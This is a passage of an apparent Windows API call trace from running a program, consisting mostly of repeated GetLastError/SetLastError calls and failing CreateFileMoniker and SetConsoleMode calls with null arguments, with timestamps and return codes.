GetLastError () returned 0x0 [0036.379] SetLastError (dwErrCode=0x0) [0036.379] GetLastError () returned 0x0 [0036.379] SetLastError (dwErrCode=0x0) [0036.379] GetLastError () returned 0x0 [0036.380] SetLastError (dwErrCode=0x0) [0036.380] GetLastError () returned 0x0 [0036.380] SetLastError (dwErrCode=0x0) [0036.380] GetLastError () returned 0x0 [0036.380] SetLastError (dwErrCode=0x0) [0036.380] GetLastError () returned 0x0 [0036.380] SetLastError (dwErrCode=0x0) [0036.380] GetLastError () returned 0x0 [0036.380] SetLastError (dwErrCode=0x0) [0036.380] GetLastError () returned 0x0 [0036.380] SetLastError (dwErrCode=0x0) [0036.380] GetLastError () returned 0x0 [0036.380] SetLastError (dwErrCode=0x0) [0036.380] GetLastError () returned 0x0 [0036.380] SetLastError (dwErrCode=0x0) [0036.381] GetLastError () returned 0x0 [0036.381] SetLastError (dwErrCode=0x0) [0036.381] GetLastError () returned 0x0 [0036.381] SetLastError (dwErrCode=0x0) [0036.381] GetLastError () returned 0x0 [0036.381] SetLastError (dwErrCode=0x0) [0036.381] GetLastError () returned 0x0 [0036.381] SetLastError (dwErrCode=0x0) [0036.381] GetLastError () returned 0x0 [0036.381] SetLastError (dwErrCode=0x0) [0036.381] GetLastError () returned 0x0 [0036.381] SetLastError (dwErrCode=0x0) [0036.381] GetLastError () returned 0x0 [0036.381] SetLastError (dwErrCode=0x0) [0036.381] GetLastError () returned 0x0 [0036.382] SetLastError (dwErrCode=0x0) [0036.382] GetLastError () returned 0x0 [0036.382] SetLastError (dwErrCode=0x0) [0036.382] GetLastError () returned 0x0 [0036.382] SetLastError (dwErrCode=0x0) [0036.382] GetLastError () returned 0x0 [0036.382] SetLastError (dwErrCode=0x0) [0036.382] GetLastError () returned 0x0 [0036.382] SetLastError (dwErrCode=0x0) [0036.382] GetLastError () returned 0x0 [0036.382] SetLastError (dwErrCode=0x0) [0036.382] GetLastError () returned 0x0 [0036.382] SetLastError (dwErrCode=0x0) [0036.382] GetLastError () returned 0x0 [0036.382] SetLastError (dwErrCode=0x0) [0036.382] GetLastError () returned 0x0 [0036.383] SetLastError (dwErrCode=0x0) [0036.383] GetLastError () returned 0x0 [0036.383] SetLastError (dwErrCode=0x0) [0036.383] GetLastError () returned 0x0 [0036.383] SetLastError (dwErrCode=0x0) [0036.385] GetLastError () returned 0x0 [0036.385] SetLastError (dwErrCode=0x0) [0036.385] GetLastError () returned 0x0 [0036.385] SetLastError (dwErrCode=0x0) [0036.385] GetLastError () returned 0x0 [0036.385] SetLastError (dwErrCode=0x0) [0036.385] GetLastError () returned 0x0 [0036.385] SetLastError (dwErrCode=0x0) [0036.385] GetLastError () returned 0x0 [0036.385] SetLastError (dwErrCode=0x0) [0036.385] GetLastError () returned 0x0 [0036.385] SetLastError (dwErrCode=0x0) [0036.385] GetLastError () returned 0x0 [0036.386] SetLastError (dwErrCode=0x0) [0036.386] GetLastError () returned 0x0 [0036.386] SetLastError (dwErrCode=0x0) [0036.386] GetLastError () returned 0x0 [0036.386] SetLastError (dwErrCode=0x0) [0036.386] GetLastError () returned 0x0 [0036.386] SetLastError (dwErrCode=0x0) [0036.386] GetLastError () returned 0x0 [0036.386] SetLastError (dwErrCode=0x0) [0036.386] GetLastError () returned 0x0 [0036.386] SetLastError (dwErrCode=0x0) [0036.386] GetLastError () returned 0x0 [0036.386] SetLastError (dwErrCode=0x0) [0036.386] GetLastError () returned 0x0 [0036.386] SetLastError (dwErrCode=0x0) [0036.386] GetLastError () returned 0x0 [0036.387] SetLastError (dwErrCode=0x0) [0036.387] GetLastError () returned 0x0 [0036.387] SetLastError (dwErrCode=0x0) [0036.387] GetLastError () returned 0x0 [0036.387] SetLastError (dwErrCode=0x0) [0036.387] GetLastError () returned 0x0 [0036.387] SetLastError (dwErrCode=0x0) [0036.387] GetLastError () returned 0x0 [0036.387] SetLastError (dwErrCode=0x0) [0036.387] GetLastError () returned 0x0 [0036.387] SetLastError (dwErrCode=0x0) [0036.387] GetLastError () returned 0x0 [0036.387] SetLastError (dwErrCode=0x0) [0036.387] GetLastError () returned 0x0 [0036.387] SetLastError (dwErrCode=0x0) [0036.387] GetLastError () returned 0x0 [0036.388] SetLastError (dwErrCode=0x0) [0036.388] GetLastError () returned 0x0 [0036.388] SetLastError (dwErrCode=0x0) [0036.388] GetLastError () returned 0x0 [0036.388] SetLastError (dwErrCode=0x0) [0036.388] GetLastError () returned 0x0 [0036.388] SetLastError (dwErrCode=0x0) [0036.388] GetLastError () returned 0x0 [0036.388] SetLastError (dwErrCode=0x0) [0036.389] GetLastError () returned 0x0 [0036.389] SetLastError (dwErrCode=0x0) [0036.389] GetLastError () returned 0x0 [0036.389] SetLastError (dwErrCode=0x0) [0036.389] GetLastError () returned 0x0 [0036.389] SetLastError (dwErrCode=0x0) [0036.389] GetLastError () returned 0x0 [0036.389] SetLastError (dwErrCode=0x0) [0036.389] GetLastError () returned 0x0 [0036.389] SetLastError (dwErrCode=0x0) [0036.389] GetLastError () returned 0x0 [0036.389] SetLastError (dwErrCode=0x0) [0036.389] GetLastError () returned 0x0 [0036.390] SetLastError (dwErrCode=0x0) [0036.390] GetLastError () returned 0x0 [0036.390] SetLastError (dwErrCode=0x0) [0036.390] GetLastError () returned 0x0 [0036.390] SetLastError (dwErrCode=0x0) [0036.390] GetLastError () returned 0x0 [0036.390] SetLastError (dwErrCode=0x0) [0036.390] GetLastError () returned 0x0 [0036.390] SetLastError (dwErrCode=0x0) [0036.390] GetLastError () returned 0x0 [0036.391] SetLastError (dwErrCode=0x0) [0036.391] GetLastError () returned 0x0 [0036.391] SetLastError (dwErrCode=0x0) [0036.391] GetLastError () returned 0x0 [0036.391] SetLastError (dwErrCode=0x0) [0036.391] GetLastError () returned 0x0 [0036.391] SetLastError (dwErrCode=0x0) [0036.391] GetLastError () returned 0x0 [0036.391] SetLastError (dwErrCode=0x0) [0036.391] GetLastError () returned 0x0 [0036.391] SetLastError (dwErrCode=0x0) [0036.391] GetLastError () returned 0x0 [0036.391] SetLastError (dwErrCode=0x0) [0036.391] GetLastError () returned 0x0 [0036.392] SetLastError (dwErrCode=0x0) [0036.392] GetLastError () returned 0x0 [0036.392] SetLastError (dwErrCode=0x0) [0036.392] GetLastError () returned 0x0 [0036.392] SetLastError (dwErrCode=0x0) [0036.392] GetLastError () returned 0x0 [0036.392] SetLastError (dwErrCode=0x0) [0036.392] GetLastError () returned 0x0 [0036.392] SetLastError (dwErrCode=0x0) [0036.392] GetLastError () returned 0x0 [0036.392] SetLastError (dwErrCode=0x0) [0036.392] GetLastError () returned 0x0 [0036.393] SetLastError (dwErrCode=0x0) [0036.393] GetLastError () returned 0x0 [0036.393] SetLastError (dwErrCode=0x0) [0036.393] GetLastError () returned 0x0 [0036.393] SetLastError (dwErrCode=0x0) [0036.393] GetLastError () returned 0x0 [0036.393] SetLastError (dwErrCode=0x0) [0036.393] GetLastError () returned 0x0 [0036.393] SetLastError (dwErrCode=0x0) [0036.393] GetLastError () returned 0x0 [0036.393] SetLastError (dwErrCode=0x0) [0036.393] GetLastError () returned 0x0 [0036.393] SetLastError (dwErrCode=0x0) [0036.393] GetLastError () returned 0x0 [0036.393] SetLastError (dwErrCode=0x0) [0036.393] GetLastError () returned 0x0 [0036.394] SetLastError (dwErrCode=0x0) [0036.394] GetLastError () returned 0x0 [0036.394] SetLastError (dwErrCode=0x0) [0036.394] GetLastError () returned 0x0 [0036.394] SetLastError (dwErrCode=0x0) [0036.394] GetLastError () returned 0x0 [0036.394] SetLastError (dwErrCode=0x0) [0036.394] GetLastError () returned 0x0 [0036.394] SetLastError (dwErrCode=0x0) [0036.394] GetLastError () returned 0x0 [0036.394] SetLastError (dwErrCode=0x0) [0036.394] GetLastError () returned 0x0 [0036.394] SetLastError (dwErrCode=0x0) [0036.394] GetLastError () returned 0x0 [0036.394] SetLastError (dwErrCode=0x0) [0036.395] GetLastError () returned 0x0 [0036.395] SetLastError (dwErrCode=0x0) [0036.395] GetLastError () returned 0x0 [0036.395] SetLastError (dwErrCode=0x0) [0036.395] GetLastError () returned 0x0 [0036.395] SetLastError (dwErrCode=0x0) [0036.395] GetLastError () returned 0x0 [0036.395] SetLastError (dwErrCode=0x0) [0036.395] GetLastError () returned 0x0 [0036.395] SetLastError (dwErrCode=0x0) [0036.395] GetLastError () returned 0x0 [0036.395] SetLastError (dwErrCode=0x0) [0036.395] GetLastError () returned 0x0 [0036.395] SetLastError (dwErrCode=0x0) [0036.395] GetLastError () returned 0x0 [0036.396] SetLastError (dwErrCode=0x0) [0036.396] GetLastError () returned 0x0 [0036.396] SetLastError (dwErrCode=0x0) [0036.396] GetLastError () returned 0x0 [0036.396] SetLastError (dwErrCode=0x0) [0036.396] GetLastError () returned 0x0 [0036.396] SetLastError (dwErrCode=0x0) [0036.396] GetLastError () returned 0x0 [0036.396] SetLastError (dwErrCode=0x0) [0036.396] GetLastError () returned 0x0 [0036.396] SetLastError (dwErrCode=0x0) [0036.396] GetLastError () returned 0x0 [0036.396] SetLastError (dwErrCode=0x0) [0036.396] GetLastError () returned 0x0 [0036.396] SetLastError (dwErrCode=0x0) [0036.396] GetLastError () returned 0x0 [0036.396] SetLastError (dwErrCode=0x0) [0036.399] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4056df) returned 0x0 [0036.402] GetLastError () returned 0x0 [0036.402] SetLastError (dwErrCode=0x0) [0036.402] GetLastError () returned 0x0 [0036.402] SetLastError (dwErrCode=0x0) [0036.402] GetLastError () returned 0x0 [0036.402] SetLastError (dwErrCode=0x0) [0036.402] GetLastError () returned 0x0 [0036.402] SetLastError (dwErrCode=0x0) [0036.402] GetLastError () returned 0x0 [0036.402] SetLastError (dwErrCode=0x0) [0036.402] GetLastError () returned 0x0 [0036.402] SetLastError (dwErrCode=0x0) [0036.402] GetLastError () returned 0x0 [0036.402] SetLastError (dwErrCode=0x0) [0036.402] GetLastError () returned 0x0 [0036.402] SetLastError (dwErrCode=0x0) [0036.402] GetLastError () returned 0x0 [0036.402] SetLastError (dwErrCode=0x0) [0036.402] GetLastError () returned 0x0 [0036.402] SetLastError (dwErrCode=0x0) [0036.402] GetLastError () returned 0x0 [0036.402] SetLastError (dwErrCode=0x0) [0036.402] GetLastError () returned 0x0 [0036.402] SetLastError (dwErrCode=0x0) [0036.403] GetLastError () returned 0x0 [0036.403] SetLastError (dwErrCode=0x0) [0036.403] GetLastError () returned 0x0 [0036.403] SetLastError (dwErrCode=0x0) [0036.403] GetLastError () returned 0x0 [0036.403] SetLastError (dwErrCode=0x0) [0036.403] GetLastError () returned 0x0 [0036.403] SetLastError (dwErrCode=0x0) [0036.403] GetLastError () returned 0x0 [0036.403] SetLastError (dwErrCode=0x0) [0036.403] GetLastError () returned 0x0 [0036.403] SetLastError (dwErrCode=0x0) [0036.403] GetLastError () returned 0x0 [0036.403] SetLastError (dwErrCode=0x0) [0036.403] GetLastError () returned 0x0 [0036.403] SetLastError (dwErrCode=0x0) [0036.403] GetLastError () returned 0x0 [0036.403] SetLastError (dwErrCode=0x0) [0036.403] GetLastError () returned 0x0 [0036.403] SetLastError (dwErrCode=0x0) [0036.403] GetLastError () returned 0x0 [0036.403] SetLastError (dwErrCode=0x0) [0036.403] GetLastError () returned 0x0 [0036.403] SetLastError (dwErrCode=0x0) [0036.403] GetLastError () returned 0x0 [0036.403] SetLastError (dwErrCode=0x0) [0036.403] GetLastError () returned 0x0 [0036.403] SetLastError (dwErrCode=0x0) [0036.403] GetLastError () returned 0x0 [0036.403] SetLastError (dwErrCode=0x0) [0036.403] GetLastError () returned 0x0 [0036.403] SetLastError (dwErrCode=0x0) [0036.403] GetLastError () returned 0x0 [0036.403] SetLastError (dwErrCode=0x0) [0036.403] GetLastError () returned 0x0 [0036.403] SetLastError (dwErrCode=0x0) [0036.404] GetLastError () returned 0x0 [0036.404] SetLastError (dwErrCode=0x0) [0036.404] GetLastError () returned 0x0 [0036.404] SetLastError (dwErrCode=0x0) [0036.404] GetLastError () returned 0x0 [0036.404] SetLastError (dwErrCode=0x0) [0036.404] GetLastError () returned 0x0 [0036.404] SetLastError (dwErrCode=0x0) [0036.404] GetLastError () returned 0x0 [0036.404] SetLastError (dwErrCode=0x0) [0036.404] GetLastError () returned 0x0 [0036.404] SetLastError (dwErrCode=0x0) [0036.404] GetLastError () returned 0x0 [0036.404] SetLastError (dwErrCode=0x0) [0036.404] GetLastError () returned 0x0 [0036.404] SetLastError (dwErrCode=0x0) [0036.404] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.405] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.405] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.405] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.405] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.405] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.405] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.405] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.405] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.405] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.405] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.405] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.405] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.405] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.405] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.405] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.405] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.405] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.405] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.406] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.406] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.406] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.406] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.406] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.406] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.406] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.406] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.406] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.406] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.406] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.406] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.406] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.406] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.406] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.406] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.406] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.406] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.406] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.406] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.406] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.406] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.406] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.406] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.406] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.406] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.407] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.407] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.407] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.407] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.407] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.407] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.407] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.407] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.407] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.407] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.407] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.407] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.407] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.407] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.407] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.407] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.407] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.407] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.407] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.407] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.407] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.407] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.407] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.407] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.407] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.407] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.407] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.408] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.408] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.408] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.408] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.408] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.408] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.408] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.408] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.408] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.408] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.408] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.409] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.409] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.409] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.409] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.409] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.409] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.409] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.409] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.409] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.409] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.409] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.409] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.409] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.409] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.409] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.409] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.409] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.409] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.409] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.409] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.409] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.409] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.409] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.409] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.409] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.409] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.410] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.410] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.410] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.410] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.410] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.410] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.410] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.410] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.410] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.410] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.410] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.410] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.410] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.410] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.410] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.410] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.410] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.410] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.410] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.410] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.410] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.410] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.410] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.410] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.410] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.411] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.411] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.411] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.411] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.411] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.411] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.411] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.411] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.411] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.411] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.411] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.411] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.411] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.411] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.411] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.411] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.411] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.411] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.411] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.411] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 